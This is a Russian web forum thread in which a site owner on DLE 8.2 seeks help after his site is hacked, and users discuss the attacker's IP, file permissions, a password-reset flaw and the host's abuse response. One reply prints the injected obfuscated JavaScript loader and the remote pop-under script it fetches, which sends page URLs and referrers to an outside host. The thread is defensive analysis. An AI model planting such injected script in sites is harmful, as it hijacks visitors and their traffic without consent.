Что делать, если взламывают сайт?

[Morfi]

Что то не грузится, задосили что ли уже?

[Chernyshev]

Информация об ip-адресе 81.222.236.68

% This is the RIPE Database query service.
% The objects are in RPSL format.
%
% The RIPE Database is subject to Terms and Conditions.
% See www.ripe.net/db/support/db-terms-conditions.pdf

% Note: This output has been filtered.
% To receive output for a database update, use the "-B" flag.

% Information related to '81.222.236.0 — 81.222.236.255'

inetnum: 81.222.236.0 — 81.222.236.255
netname: TimeWeb
descr: Hosting Service Provider
country: RU
admin-c: AAB74-RIPE
tech-c: AAB74-RIPE
status: ASSIGNED PA
mnt-by: ELTEL-RIPE-MNT
source: RIPE # Filtered

person: Alexandr A Boykov
address: 13, Sedova st.
address: 192148, Saint-Petersburg
address: Russia
phone: +7 812 3341520
fax-no: +7 812 3341530
abuse-mailbox: abuse@timeweb.ru
nic-hdl: AAB74-RIPE
mnt-by: ELTEL-RIPE-MNT
source: RIPE # Filtered

Может так проще?

[DevilStar]

Выходит кто-то с VPS (VDS) ломает сайты? Сейчас напишу письмецо.

[lifestar]

Александр Бойков вообще то из руководителей Таймвеба и ай пи этой компании, просто атака идёт с их сервера. Туда и надо писать

[DevilStar]

Уже писал, ответа пока что нет.

[jeje]

ftp? уже долгое время (на моей памяти 2 года), в сети существует нечто, что обходило ftp авторизацию и портило файлы типа index, default, main дописывая в них <script>, это происходило как на простых хостингах, так и на больших серверах, где отдельный персонал занимался администрированием. Проблему решили переходом на sftp.

[DevilStar]

Этот скриптик появился в файле типа main.tpl, в шаблоне в общем. Т.к. был взломан админский аккаунт, то прописать в шаблон заразу — 5 секунд.

[jeje]

Я не могу утверждать, что дырок у нас нет, но у нас вся работа через консоль, интерфейса веб-администрирования нет. Пароли по всем правилам и перебора не было.

[Root1564]

поэтому советую поставить на файлы шаблона права 666, а не 777 — ИМХО, шаблон нужно редактировать через FTP, а не через встроенные средства DLE ;)

[Root1564]

извиняюсь, не 666 права, а 644 ;)
666 права как раз и дают право на публичную запись, а 644 запрещают вносить любые записи в файл снаружи :)

[impass]

лучше использовать хостинг с suPHP и ставить 0600 на все критичные файлы

[impass]

Авторизацию никто не обходит волшебным образом. Ломают или через другие сайты на сервере (даже при полусотне аккаунтов наверняка найдётся хотя бы один с бородатой багой), если у вас виртуальный хостинг, или через скрипты, установленные у вас же (особенно если они самописные или давно не обновлялись).
Зайдите на любой более-менее крупный «хак»-форум и обратите внимание, что там многие покупают/продают FTP аккаунты или веб-шеллы. Вот собственно с единственной целью, чтобы потом гнать «траффик» с пострадавших сайтов, на которых внедрят свой JS код.

[calg0n]

используйте стабильные версии продуктов и почаще обновляйтесь. вам поставили обычный сниффер, который тупо угоняет кукисы, сессии и все что с этим связано.

[DevilStar]

Хм, а как его обнаружить? В исходном коде страницы ничего подозрительного. На сайт захожу с момента первого взлома только в режиме инкогнито (браузер Chrome)

[calg0n]

режим инкогнито от этого не поможет, он предназначен, чтобы не оставлять следов после своей работы (история, кукисы, сессии, кэш...) — сессии, куки и прочее в этом режиме все равно цепляются. тут может помочь установка атрибутов файлов\папок на сервере в режим readonly и невозможность редактирования кода через веб-морду (даже админу).

В исходном коде страницы ничего подозрительного

я когда-то давно читал, что через гиф-файл можно было внедрить яваскрипт-код и он исполнялся при открытии этого файла.

также вероятно умельцы нащупали уязвимость в DLE или\и в IPB. эксплоиты к таким вещам оч быстро по инету располазются.

[DevilStar]

Ок, поработаю с правами доступа к файлам. С запретам редактирования шаблона через сайт сложнее… Но тоже подумаю как реализовать.

[impass]

Далеко не всеми угнанными куки можно будет воспользоваться с другого хоста, особенно если прошло достаточно времени и сессия «умерла», разработчики популярных движков не все такие лапти. А вот втихаря внести какие-то изменения в админке (добавить админа, изменить данные) через CSRF-уязвимости — более реально.

[calg0n]

согласен. такое развитие событий также возможно.

[eli314]

Последнее время много пишут по этому поводу. И всегда присутствует DLE 8.2, так что скорее всего проблема в нем.

[DevilStar]

Жаль сайт лег и я не сохранил логи. Но судя по тому что лог hacked_dle был самым маленьким — там не только dle. Попробую обновиться до 8.3, хотя там вроде не было исправлений, связанных с безопасностью.

[chepa]

Лицензия DLE 8.2?

[DevilStar]

Конечно.

[chepa]

А то я знаю пересылку админ пароля делают.

[DevilStar]

Омг какой кошмар. Пошол исправлять. Большое спасибо за ценное указание!

[alfsoft]

Ужас. Попробовал на каком-то сайте из того списка — и сработало. Мне тут же сгенерировали новый пароль. Тут же написал администрации сайта о том, что их могут (и, в принципе, давно уже) взломать. Дал ссылку на этот топик.

[MARDEN]

Судя по информации на сайте dle, данной уязвимости подвержена только версия 8.2.

[0xZ]

Углубимся в детали.

hxxp://softxx.ru/m

идем по адресу и получаем:

1. j="%3Cscript%20language%3D%22Javascript%22%20type%3D%22text%2FJavascript%22%20charset%3D%22windows-1251%22%3Eeval%28function%28p%2Ca%2Cc%2Ck%2Ce%2Cd%29%7Be%3Dfunction%28c%29%7Breturn%20c.toString%2836%29%7D%3Bif%28%21%27%27.replace%28%2F%5E%2F%2CString%29%29%7Bwhile%28c--%29%7Bd%5Bc.toString%28a%29%5D%3Dk%5Bc%5D%7C%7Cc.toString%28a%29%7Dk%3D%5Bfunction%28e%29%7Breturn%20d%5Be%5D%7D%5D%3Be%3Dfunction%28%29%7Breturn%27%5C%5Cw%2B%27%7D%3Bc%3D1%7D%3Bwhile%28c--%29%7Bif%28k%5Bc%5D%29%7Bp%3Dp.replace%28new%20RegExp%28%27%5C%5Cb%27%2Be%28c%29%2B%27%5C%5Cb%27%2C%27g%27%29%2Ck%5Bc%5D%29%7D%7Dreturn%20p%7D%28%276.7%28%22%3C0%3E8%22%2B%22%3D5%3B%3C%5C%5C%2F%22%2B%220%3E%3C0%209%22%2B%224%3D%5C%5C%221%5C%5C%22%202%3D%5C%5C%223%2F1%5C%5C%22%20a%3D%5C%5C%22i%22%2B%22-g%5C%5C%22%20h%22%2B%22%3D%5C%5C%22f%3A%2F%2F%22%2B%22e.b%2Fc.d%5C%5C%22%3E%3C%5C%5C%2F0%3E%22%29%3B%27%2C19%2C19%2C%27script%7CJavascript%7Ctype%7Ctext%7Cnguage%7C4227%7Cdocument%7Cwrite%7Cizs%7Cla%7Ccharset%7Ccom%7Cj3%7Cphp%7Clycosu%7Chttp%7C1251%7Csrc%7Cwindows%27.split%28%27%7C%27%29%2C0%2C%7B%7D%29%29%0A%3C%2Fscript%3E";j=j.replace(/Ь/g,"5C");j=j.replace(/А/g,"7C");j=j.replace(/С/g,"3D");document.write(unescape(j));

выполняем и получаем:

1. <script language="Javascript" type="text/Javascript" charset="windows-1251">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('+e(c)+','g'),k[c])}}return p}('6.7("<0>8"+"=5;<,19,19,'script|Javascript|type|text|nguage|4227|document|write|izs|la|charset|com|j3|php|lycosu|http|1251|src|windows'.split('|'),,{}))

выполняем далее и получаем линк:

hxxp://lycosu.com/j3.php

внутри нас ожидает:

1. ss=escape(window.location.href); rr=escape(document.referrer);
2.  
3. w11=450; h11=450;
4. x11=195; y11=195;
5.  
6.  
7. $js_unzdrr930=;
8.  
9. function tix_ukor930() {document.onmousemove=tip_ufforr940; }
10. function tip_ufforr940() {document.onmouseup=jstwonderz930; document.onclick=jstwonderz930; document.onmouseover=tix_ukor930;}
11. var zz1=setTimeout("tip_ufforr940()",400);
12. var zz2=setTimeout("tip_ufforr940()",900);
13. var zz3=setTimeout("tip_ufforr940()",1480);
14. var zz4=setTimeout("tip_ufforr940()",1950);
15. var zz5=setTimeout("tip_ufforr940()",990);
16. var zz5=setTimeout("tip_ufforr940()",2100);
17.  
18. document.onmouseover=tix_ukor930;
19. document.onmousemove=tip_ufforr940;
20. tip_ufforr940();
21.  
22. document.onmouseup=jstwonderz930;document.onclick=jstwonderz930;function jstwonderz930(){               if($js_unzdrr930==)    {                       $js_otkr_URL940="http://lyc"+"osy.com/on.php?id="+izs+"&ss="+ss+"&rr="+rr+"&tema=cliku"+"ndr";          $CookieTest930=navigator.cookieEnabled;         if($CookieTest930)              {                       $ISawAdvert940=js_fongetC930("2511uwtiiz_oqiy"+izs);                    if(!$ISawAdvert940)                     { $js_unzdrr930=$js_unzdrr930+1;                                                                        $js_undrwins940=window.open($js_otkr_URL940,"_blank","toolbar=yes, location=yes, directories=yes, status=yes, menubar=yes, scrollbars=yes, resizable=yes, width="+w11+", height="+h11+", left="+x11+", top="+y11+", copyhistory=yes");  window.focus();                                 if($js_undrwins940)                                     {                                               js_ssetCooki930("2511uwtiiz_oqiy"+izs,1,13);                                            $js_undrwins940.blur();                                         }                       }               }       }}function js_ssetCooki930($Name,$Value,$EndH){ var exdate=new Date();  $EndH=exdate.getHours()+$EndH;  exdate.setHours($EndH); document.cookie=$Name+ "=" +escape($Value)+(($EndH==null) ? "" : ";expires="+exdate.toGMTString()+"; path=/;");}function js_fongetC930($Name){  if (document.cookie.length>)   {               $Start=document.cookie.indexOf($Name + "=");            if ($Start!=-1)         {               $Start=$Start + $Name.length+1;                 $End=document.cookie.indexOf(";",$Start);               if ($End==-1) $End=document.cookie.length;              return unescape(document.cookie.substring($Start,$End));           }    }       return "";}  var zz5=setTimeout("tix_ukor930()",1020); tip_ufforr940();

Далее смотреть смысла нет.

Что имеем в итоге:

hxxp://lycosu.com = hxxt://1under.ru

1under.ru — надежная партнерская программа вебмастеру 

Наша партнерская программа предлагает владельцам сайтов (партнерам) выкуп трафика посредством следующих технологий: текстовая контекстная реклама, тизерная реклама, клик-андер, попандер (pop-under) баннер, FreeLink, растяжки в шапке (топлайн). Рекламодатели могут купить в нашей системе трафик необходимого таргетинга и объема.

Выкуп трафика производится по следующим ценам:

Стоимость 1000 хостов (уникальных IP) – 4 wmz

______________________
Текст подготовлен в Хабра Редакторе от © SoftCoder.ru

[egoserg]

=====
1under.ru — надежная партнерская программа вебмастеру
=====
После такой аферы, както мне не верится что они надежные

[DevilStar]

Может они сами по себе и надежные, но попался недобросовестный юзер, который решил на них заработать бабла.

[impass]

Выполнять неизвестный код совсем не обязательно, даже вредно. :) Безопаснее и быстрее пользоваться деобфускаторами JS типа Malzilla.

[0xZ]

виртуальная машина + прямые руки

[Alinaki]

DLE? И что, много его стоит ненуленного у людей? ССЗБ…

[dmitryrublev]

Хочу отметить один момент — наличие страшной уязвимости DLE в версии 8.2 — можно сбросить пароль любого юзера.
Фикс по этой проблеме на сайте разработчика есть. Особой шумихи не было, т.к. фикс именовался стандартным названием «недостаточная фильтрация данных».

Вот ссылка на сайт разработчика по поводу бреши в системе восстановления пароля: dle-news

[dmitryrublev]

Благодаря этой уязвимости, злоумышленнику не составляет труда получить доступ к админке сайта, и прописать в шаблон что угодно, посливать базы, залить шелл и т.д…

[dmitryrublev]

Блин, я невнимательный. bo2l раньше о этом же написал.

[Root1564]

А администратору не составляет труда поставить на файлы шаблона права 644! Я никогда не понимал, зачем вообще редактировать шаблон из админки — во-первых неудобно, во-вторых небезопасно, что и было показано в этом топике.

[dmitryrublev]

Зная нынешних «вебмастеров» — многие из них в HTML не особо сильны(и больше половины из них еще не окончили школу), не говоря уже об остальном. Поэтому, мало кто думает о вопросах безопасности на сайте.

Это очень благодатная почва для таких же малолетних «хакеров».

[Root1564]

«…злоумышленнику не составляет труда… посливать базы…»
создать файл .htaccess и прописать в него следующее:
RedirectMatch (.*).sql.*$ хттп://ваш_домен.ру
залить файл в папку /backup/
тоже не понимаю этого маразма — нахрена опять же снижать безопасность сайта, позволяя скачивать бекап базы напрямую через http? так еще и ссылку для скачивания нового бекапа ставят по окончании резервирования… что мешает делать это через FTP? видимо, лень…
кстати, на старых движках (ниже 8.2) так можно с легкостью увести бекап базы сайта методом подбора даты и времени (разумеется, если не стоит редирект и администрация вообще проделывает резервирование встроенными методами. Самое забавное, если ставят ежедневный бекап в строго указанное время...)

[DevilStar]

У меня бекапы лежат в папке www, так что скачивание только через ftp. Да и появляются они там только по моему запросу.

[TDz]

На этой дыре поимели столько сайтов что DLE даже официально разослала страшное предупреждение всем клиентам и срочно попросила всех всё пофиксить. Могли бы для этих целей уже автоматический модуль сделать учитывая регулярность нахождения дыр в этом чудном двиге

[DevilStar]

Сегодня пришел ответ на письмо:

TimeWeb Abuse Team

Спасибо за Ваше сообщение.

VPS данного пользователя закрыт.

[0xZ]

С одной стороны хорошо что так быстро, с другой жалко что не успел слить содержание каталога.